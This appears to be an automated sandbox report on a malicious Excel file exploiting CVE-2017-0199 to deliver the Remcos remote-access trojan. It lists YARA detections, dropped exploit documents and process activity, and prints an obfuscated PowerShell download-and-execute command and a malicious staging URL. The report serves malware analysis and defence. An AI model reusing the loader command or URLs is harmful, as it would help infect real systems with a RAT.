                  Source: Yara match | File source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 12.2.powershell.exe.417eb20.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 12.2.powershell.exe.417eb20.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0000000E.00000002.1041669292.0000000000315000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000E.00000002.1041669292.0000000000331000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000C.00000002.439632807.0000000003E59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: powershell.exe PID: 2900, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 2496, type: MEMORYSTR

                  System Summary

                  Source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 12.2.powershell.exe.417eb20.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 12.2.powershell.exe.417eb20.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 12.2.powershell.exe.417eb20.1.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 12.2.powershell.exe.417eb20.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 12.2.powershell.exe.417eb20.1.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 12.2.powershell.exe.417eb20.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 0000000C.00000002.439632807.0000000003E59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 3308, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 2900, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 2900, type: MEMORYSTR | Matched rule: Detects Invoke-Mimikatz String Author: Florian Roth
                  Source: Process Memory Space: powershell.exe PID: 2900, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: RegAsm.exe PID: 2496, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sreemanganshekumarsayingbuttersmoothbunneverhandlingthesweetmilkbunwhichreallytastywithbuttersmooththings_________getitsbacktotheroadwith[1].doc, type: DROPPED | Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F9C7AC5D.doc, type: DROPPED | Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\UlEYs1.url
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\zhort.de.url
                  Source: C:\Windows\SysWOW64\wscript.exe | Process created: Commandline size = 9398
                  Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? 
? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?E
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Memory allocated: 770B0000 page execute and read and write
                  Source: C:\Windows\SysWOW64\wscript.exe | Memory allocated: 770B0000 page execute and read and write
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Memory allocated: 770B0000 page execute and read and write
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Memory allocated: 770B0000 page execute and read and write
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Memory allocated: 770B0000 page execute and read and write
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Memory allocated: 770B0000 page execute and read and write
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_0041330D OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_0041BBC6 OpenProcess,NtResumeProcess,CloseHandle
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_0041BB9A OpenProcess,NtSuspendProcess,CloseHandle
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_00401806 NtdllDefWindowProc_W
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_004018C0 NtdllDefWindowProc_W
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 16_2_004016FD NtdllDefWindowProc_A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 16_2_004017B7 NtdllDefWindowProc_A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_00402CAC NtdllDefWindowProc_A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_00402D66 NtdllDefWindowProc_A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 12_2_00294D58
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 12_2_00294D48
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_0043706A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_00414005
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_0043E11C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_004541D9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_004381E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_0041F18B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_00446270
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_0043E34B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_004533AB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_0042742E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_00437566
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_0043E5A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_004387F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_0043797E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_004339D7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_0044DA49
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_00427AD7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_0041DBF3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_00427C40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_00437DB3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_00435EEB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_0043DEED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_00426E9F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_10017194
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_1000B5C1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_0044B040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_0043610D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_00447310
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_0044A490
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_0040755A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_0043C560
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_0044B610
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_0044D6C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_004476F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_0044B870
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_0044081D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_00414957
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_004079EE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00407AEB15_2_00407AEB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044AA8015_2_0044AA80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00412AA915_2_00412AA9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00404B7415_2_00404B74
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00404B0315_2_00404B03
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044BBD815_2_0044BBD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00404BE515_2_00404BE5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00404C7615_2_00404C76
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00415CFE15_2_00415CFE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00416D7215_2_00416D72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00446D3015_2_00446D30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00446D8B15_2_00446D8B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00406E8F15_2_00406E8F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0040503816_2_00405038
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0041208C16_2_0041208C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_004050A916_2_004050A9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0040511A16_2_0040511A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0043C13A16_2_0043C13A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_004051AB16_2_004051AB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0044930016_2_00449300
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0040D32216_2_0040D322
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0044A4F016_2_0044A4F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0043A5AB16_2_0043A5AB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0041363116_2_00413631
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0044669016_2_00446690
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0044A73016_2_0044A730
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_004398D816_2_004398D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_004498E016_2_004498E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0044A88616_2_0044A886
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0043DA0916_2_0043DA09
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00438D5E16_2_00438D5E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00449ED016_2_00449ED0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0041FE8316_2_0041FE83
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00430F5416_2_00430F54
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004050C217_2_004050C2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004014AB17_2_004014AB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040513317_2_00405133
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004051A417_2_004051A4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040124617_2_00401246
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040CA4617_2_0040CA46
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040523517_2_00405235
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004032C817_2_004032C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040168917_2_00401689
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00402F6017_2_00402F60
Source: SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.16063.8851.xlsx | OLE indicator, VBA macros: true
Source: SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.16063.8851.xlsx | Stream path 'MBD00533CD9/\x1Ole' : https://zhort.de/UlEYs1f!i3~l& P@j!xn;3=3\7,e03Y-ujIOCtA58ItTDtFyHDfH2O20sjl3RS1dFyURpFm4F4y33vyEjfA2G85qDJZzAri5P9dXKKVDGqakVtafZvJ15mkZNIDQjVQRx0H7FAnkFojkIJ2f7T,5DbRPYj7Do
Source: ~WRF{5CA061CB-7A8F-4A69-A3FF-239624BEF21A}.tmp.3.dr | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 004169A7 appears 87 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 004165FF appears 35 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00434801 appears 41 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00422297 appears 42 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00434E70 appears 54 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00402093 appears 49 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 0044DB70 appears 41 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00401E65 appears 35 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00444B5A appears 37 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00413025 appears 79 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00416760 appears 69 times
Source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
